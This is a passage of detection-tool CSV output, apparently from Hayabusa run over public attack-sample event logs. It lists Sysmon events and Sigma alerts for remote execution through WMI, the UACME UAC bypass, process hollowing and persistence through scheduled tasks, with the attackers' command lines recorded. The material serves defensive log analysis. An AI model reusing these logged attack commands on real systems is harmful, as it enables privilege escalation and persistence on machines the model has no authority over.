PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.810 
+09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 
23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: 
HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet 
Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: 
SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 
747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN 
DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task 
Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 
